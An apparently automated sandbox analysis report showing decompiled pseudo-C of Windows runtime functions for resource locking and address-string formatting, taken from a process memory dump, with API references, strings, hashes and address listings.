0x00890c6a
0x00890c6f
0x008beb42
0x00000000
0x00000000
0x008beb48
0x008beb48
0x00890c75
0x00890c7a
0x008beb54
0x00000000
0x00000000
0x00000000
0x008beb5a
0x00890c80
0x00890c84
0x008beb98
0x00000000
0x00000000
0x008beba6
0x00890cb8
0x00890cba
0x00890cd3
0x00890cda
0x00890ce4
0x00890ce9
0x00000000
0x00890cec
0x00890c8c
0x008beb63
0x00000000
0x00000000
0x008beb70
0x008beb75
0x008beb7d
0x00000000
0x00000000
0x008beb8c
0x00000000
0x008beb8c
0x00890c96
0x00000000
0x00000000
0x00890ca2
0x00890cac
0x00890cb4
0x00000000
0x00000000
0x00890b44
0x00890b47
0x00890b49
0x00000000
0x00000000
0x00890b4f
0x00890b50
0x00000000
0x00000000
0x00890b56
0x00890b62
0x00890b7c
0x00890bac
0x00890a0f
0x008beaaa
0x00000000
0x008beac4
0x008beac4
0x00890bd0
0x00890bd0
0x00890bd4
0x00890bd9
0x00000000
0x00000000
0x00890bdb
0x00890be0
0x008beb0e
0x00890a1a
0x00000000
0x00890a1a
0x008beb1a
0x008beb1f
0x008beb27
0x00000000
0x00000000
0x008beb36
0x00000000
0x008beb36
0x00890bea
0x00000000
0x00000000
0x00890bf6
0x00890c00
0x00890c03
0x00890c0b
0x00000000
0x00890c0b
0x008beaaa
0x00000000
0x00890a15
0x00890bb6
0x00000000
0x00890bc6
0x00890bc6
0x00890bcb
0x00890c15
0x00000000
0x00000000
0x00890c1d
0x00890c20
0x00890c21
0x00890c24
0x00890c24
0x00890c26
0x00000000
0x00890c26
0x00890bcd
0x00000000
0x00890bcd
0x00890b89
0x00890b89
0x00890b90
0x00000000
0x00000000
0x00890b96
0x00000000
0x00890b96
0x00890a04
0x00890a04
0x00890b9a
0x00890b9a
0x00890b9b
0x00890b9f
0x00000000
0x00000000
0x00000000
0x00890ba5
0x00890ac7
0x00890aca
0x008beacf
0x00000000
0x008beade
0x008beade
0x008beae3
0x00000000
0x00000000
0x008beaf3
0x008beaf6
0x008beaf7
0x008beafe
0x008beb01
0x00000000
0x008beb01
0x008beacf
0x00890ad0
0x00890ad4
0x00000000
0x00000000
0x00890ada
0x00890ae6
0x00890c34
0x00000000
0x00890c47
0x00890c49
0x00890c4a
0x00890c4e
0x00890c51
0x00890c54
0x00890c57
0x00890c5a
0x00000000
0x00000000
0x00000000
0x00890c60
0x00890afb
0x00890afe
0x00890b02
0x00890b05
0x00890b08
0x00000000
0x00890b08
0x00890ae6
0x00890b44
0x008909f8
0x008909f8
0x008909f9
0x00000000
0x00000000
0x008beaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00890BF6
__fassign.LIBCMT ref: 00890CA2

Strings

:, xrefs: 00890AC7
:, xrefs: 00890BA9
., xrefs: 00890A0C

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: 688084f030b8fd5028a8d110dc5ec42e1accb143fba33af9b211687bf4da103e
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: FBA1AC71D0431ADFCF24EF68C8446AEB7B5FF05319F28856AE852E7242D6309A41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00890554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00890554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009301c0;
									_push(_t144);
									_push(0);
									_t51 = E0084F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00894FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E008A3F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E008A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E008D217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E008A3F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00893915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009301c0;
												_push(_t138);
												_push(0);
												_t58 = E0084F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00894FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E008A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E008A3F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E008D217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E008A3F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00893915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00875384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0084F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00893915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0084F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00893915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0084F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00893915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00875329(_t110, _t138);
																_t69 = E008753A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x0089055a
0x0089055d
0x00890563
0x00890566
0x008905d8
0x008905e2
0x008905e5
0x00000000
0x008905e7
0x008905e7
0x008905ea
0x008905f3
0x008905f3
0x00890568
0x00890568
0x00890568
0x00890569
0x00890569
0x00890569
0x0089056b
0x00000000
0x00000000
0x008b217f
0x008b2183
0x008b225b
0x008b225f
0x008b2189
0x008b218c
0x008b218f
0x008b2194
0x008b2199
0x008b219d
0x008b21a0
0x008b21a2
0x008b21ce
0x008b21ce
0x008b21ce
0x008b21d0
0x008b21d6
0x008b21de
0x008b21e2
0x008b21e8
0x008b21e9
0x008b21ec
0x008b21f1
0x008b21f6
0x00000000
0x00000000
0x008b21f8
0x008b21fb
0x008b2206
0x008b220b
0x008b220c
0x008b2217
0x008b2226
0x008b222b
0x008b222c
0x008b222f
0x008b2232
0x008b2235
0x008b2235
0x008b223a
0x008b223f
0x008b2241
0x008b2243
0x008b2248
0x008b2248
0x008b224d
0x008b224f
0x008b2262
0x008b2263
0x008b2268
0x008b2269
0x008b2269
0x008b2269
0x008b226d
0x00000000
0x00000000
0x008b2276
0x008b2279
0x008b227e
0x008b2283
0x008b2287
0x008b228a
0x008b228d
0x008b228f
0x008b22bc
0x008b22bc
0x008b22bc
0x008b22be
0x008b22c4
0x008b22cc
0x008b22d0
0x008b22d6
0x008b22d7
0x008b22da
0x008b22df
0x008b22e4
0x00000000
0x00000000
0x008b22e6
0x008b22e9
0x008b22f4
0x008b22f9
0x008b22fa
0x008b2305
0x008b2314
0x008b2319
0x008b231a
0x008b231d
0x008b2320
0x008b2323
0x008b2323
0x008b2328
0x008b232d
0x008b232f
0x008b2331
0x008b2336
0x008b2336
0x008b233b
0x008b233d
0x008b2350
0x008b2351
0x008b2356
0x008b2359
0x008b2359
0x008b235b
0x008b235d
0x00875367
0x0087536b
0x00875372
0x00000000
0x00000000
0x00000000
0x00000000
0x008b2363
0x008b2363
0x008b2369
0x008b236a
0x008b236c
0x008b2371
0x008b2373
0x00000000
0x008b2379
0x008b2379
0x008b237a
0x008b237f
0x008b237f
0x008b2385
0x008b2386
0x008b2389
0x008b238e
0x008b2390
0x00875378
0x0087537c
0x008b2396
0x008b2396
0x008b2397
0x008b239c
0x008b23a2
0x008b23a3
0x008b23a6
0x008b23ab
0x008b23ad
0x00000000
0x008b23b3
0x008b23b3
0x008b23b4
0x008b23b9
0x008b23ba
0x008b23ba
0x008b23bc
0x008b23bf
0x00000000
0x00000000
0x008a9153
0x008a9158
0x008a915a
0x008a915e
0x008a9160
0x00000000
0x008a9166
0x008a9166
0x008a9171
0x008a9176
0x008a9176
0x00000000
0x008a9160
0x008b23c6
0x008b23ce
0x008b23d7
0x008b23d7
0x008b23ad
0x008b2390
0x008b2373
0x008b233f
0x008b233f
0x00000000
0x008b233f
0x008b2291
0x008b2291
0x008b2293
0x008b2295
0x008b229a
0x008b22a1
0x008b22a3
0x008b22a7
0x008b22a9
0x00000000
0x00000000
0x008b22ab
0x008b22ad
0x008b22af
0x00000000
0x00000000
0x00000000
0x008b22af
0x008b22b1
0x008b22b4
0x008b22b4
0x008b22b6
0x008753be
0x008753be
0x008753be
0x008753c0
0x00000000
0x00000000
0x008753cb
0x008753ce
0x008753d0
0x008753d4
0x008753d6
0x00000000
0x008753d8
0x008753e3
0x008753ea
0x008753ea
0x00000000
0x008753d6
0x00000000
0x00000000
0x00000000
0x00000000
0x008b22b6
0x00000000
0x008b228f
0x008b2349
0x008b234d
0x008b2251
0x008b2251
0x00000000
0x008b2251
0x008b21a4
0x008b21a4
0x008b21a6
0x008b21a8
0x008b21ac
0x008b21b6
0x008b21b8
0x008b21bc
0x008b21be
0x00000000
0x00000000
0x008b21c0
0x008b21c2
0x008b21c4
0x00000000
0x00000000
0x00000000
0x008b21c4
0x008b21c6
0x008b21c6
0x008b21c8
0x00000000
0x00000000
0x00000000
0x00000000
0x008b21c8
0x008b21a2
0x00000000
0x008b2183
0x0089057b
0x0089057d
0x00890581
0x00890583
0x008b2178
0x00000000
0x00890589
0x0089058f
0x0089058f
0x00890583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008B2206

Strings

RTL: Re-Waiting, xrefs: 008B223A, 008B2328
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 008B220E
RTL: Resource at %p, xrefs: 008B221D, 008B230B
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008B22FC

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: 1308bcba8b59a0c57a5eed0ecb0ba5254ed24d2ff474b98c80bf5c1c2d412c11
Instruction ID: 5944a5b67be2a4145b1090f46fc2d6b3860a3798719e05829e128bc2a6f24749
Opcode Fuzzy Hash: 1308bcba8b59a0c57a5eed0ecb0ba5254ed24d2ff474b98c80bf5c1c2d412c11
Instruction Fuzzy Hash: 8C514831B006016FEB15DA1CCC82FA673A9FB98725F258229FD14DF386D935EC418B91

Uniqueness

Uniqueness Score: -1.00%

Function 008914C0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E008914C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x932088; // 0x7768e72b
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00887707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E008913CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00887707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00887707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00852340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0085E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x008914c0
0x008914cb
0x008914d2
0x008914d6
0x008914da
0x008914de
0x008914e3
0x0089157a
0x0089157a
0x008914f1
0x008914f3
0x008bea0f
0x00000000
0x008bea15
0x00000000
0x008bea15
0x008914f9
0x008914f9
0x008914fe
0x00891504
0x008bea1a
0x008bea1f
0x008bea21
0x008bea22
0x008bea27
0x008bea2a
0x008bea2a
0x00891515
0x00891517
0x0089156d
0x00891572
0x00891575
0x00891575
0x0089151e
0x008bea50
0x008bea55
0x008bea58
0x008bea58
0x0089152e
0x00891531
0x00891533
0x00000000
0x00891535
0x00891541
0x00891549
0x00891549
0x00891533
0x008914f3
0x00891559

APIs

___swprintf_l.LIBCMT ref: 008BEA22

Part of subcall function 008913CB: ___swprintf_l.LIBCMT ref: 0089146B
Part of subcall function 008913CB: ___swprintf_l.LIBCMT ref: 00891490

___swprintf_l.LIBCMT ref: 0089156D

Strings

+hw, xrefs: 008914CB
]:%u, xrefs: 008BEA47
%%%u, xrefs: 00891564

Memory Dump Source

Source File: 00000006.00000002.2220430056.0000000000840000.00000040.00000001.sdmp, Offset: 00830000, based on PE: true

Associated: 00000006.00000002.2220420840.0000000000830000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220527396.0000000000920000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220532757.0000000000930000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220537656.0000000000934000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220543758.0000000000937000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220549325.0000000000940000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2220585078.00000000009A0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: %%%u$+hw$]:%u
API String ID: 48624451-888574601
Opcode ID: e7aef026dbae33c5159153064f9347acc0dc2d7770d8ca5c2ee3ecf90ccc28ab
Instruction ID: b79a6af8e24e4bf480ebaa2a3791af8f24b893255340c737e756f032ec17b5ac
Opcode Fuzzy Hash: e7aef026dbae33c5159153064f9347acc0dc2d7770d8ca5c2ee3ecf90ccc28ab
Instruction Fuzzy Hash: 43219C7290422A9BCF20BE58CC49AEA73BCFB60705F5A4051FC46D3240DB74AA588BE1

Uniqueness

Uniqueness Score: -1.00%

Function 008753A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E008753A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009301c0;
									_push(_t92);
									_push(0);
									_t37 = E0084F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00894FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E008A3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E008A3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E008D217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E008A3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00893915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00875384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0084F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00893915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0084F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00893915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0084F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00893915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00875329(_t74, _t92);
													_push(1);
													_t48 = E008753A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}

0x008753ab
0x008753ae
0x008753b1
0x008753b4
0x008753b7
0x008905b6
0x008905c0
0x008905c3
0x00000000
0x008905c9
0x008905c9
0x008905cc
0x008905d5
0x008905d5
0x008753bd
0x008753bd
0x008753bd
0x008753be
0x008753be
0x008753be
0x008753c0
0x00000000
0x00000000
0x008b2269
0x008b226d
0x008b2349
0x008b234d
0x008b2273
0x008b2276
0x008b2279
0x008b227e
0x008b2283
0x008b2287
0x008b228a
0x008b228d
0x008b228f
0x008b22bc
0x008b22bc
0x008b22bc
0x008b22be
0x008b22c4
0x008b22cc
0x008b22d0
0x008b22d6
0x008b22d7
0x008b22da
0x008b22df
0x008b22e4
0x00000000
0x00000000
0x008b22e6
0x008b22e9
0x008b22f4
0x008b22f9
0x008b22fa
0x008b2305
0x008b2314
0x008b2319
0x008b231a
0x008b231d
0x008b2320
0x008b2323
0x008b2323
0x008b2328
0x008b232d
0x008b232f
0x008b2331
0x008b2336
0x008b2336
0x008b233b
0x008b233d
0x008b2350
0x008b2351
0x008b2356
0x008b2359
0x008b2359
0x008b235b
0x008b235d
0x00875367
0x0087536b
0x00875372
0x00000000
0x00000000
0x00000000
0x00000000
0x008b2363
0x008b2363
0x008b2369
0x008b236a
0x008b236c
0x008b2371
0x008b2373
0x00000000
0x008b2379
0x008b2379
0x008b237a
0x008b237f
0x008b237f
0x008b2385
0x008b2386
0x008b2389
0x008b238e
0x008b2390
0x00875378
0x0087537c
0x008b2396
0x008b2396
0x008b2397
0x008b239c
0x008b23a2
0x008b23a3
0x008b23a6
0x008b23ab
0x008b23ad
0x00000000
0x008b23b3
0x008b23b3
0x008b23b4
0x008b23b9
0x008b23ba
0x008b23ba
0x008b23bc
0x008b23bf
0x00000000
0x00000000
0x008a9153
0x008a9158
0x008a915a
0x008a915e
0x008a9160
0x00000000
0x008a9166
0x008a9166
0x008a9171
